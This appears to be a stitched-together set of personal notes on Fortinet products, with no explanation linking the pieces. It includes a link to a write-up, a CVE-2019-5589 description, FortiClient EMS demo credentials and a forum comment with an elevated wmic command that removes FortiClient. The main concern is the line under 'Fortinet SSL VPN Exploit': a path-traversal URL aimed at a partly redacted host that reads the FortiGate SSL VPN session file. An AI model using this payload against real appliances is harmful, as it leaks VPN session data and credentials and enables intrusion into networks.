fortinet

https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
https://xxx.x.be:8443/remote/fgt_lang?lang=en
https://xxx.x.be:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Fortinet SSL VPN Exploit

Vulnerability Details : CVE-2019-5589
An Unsafe Search Path vulnerability in FortiClient Online Installer (Windows version before 6.0.6) may allow an unauthenticated,
remote attacker with control over the directory in which FortiClientOnlineInstaller.exe resides to execute arbitrary code on the system via
uploading malicious .dll files in that directory.
Publish Date : 2019-05-28 Last Update Date : 2019-05-29

forticlient ems demo [ This is Fortinet’s FortiClient EMS demo. Please use following credentials to login to FortiClient EMS Username: corp\demo Password: Fortinet1 ]
https://fctems.fortidemo.com/signin

I really hate the idiots who thought hiding the “Uninstall” button from Programs and Features was either clever or useful.
Here’s a command (run elevated!) that successfully removed this shitstain from my Windows 10 PC:
wmic product where “name like ‘Forti%%'” call uninstall /nointeractive

Dit werk mooi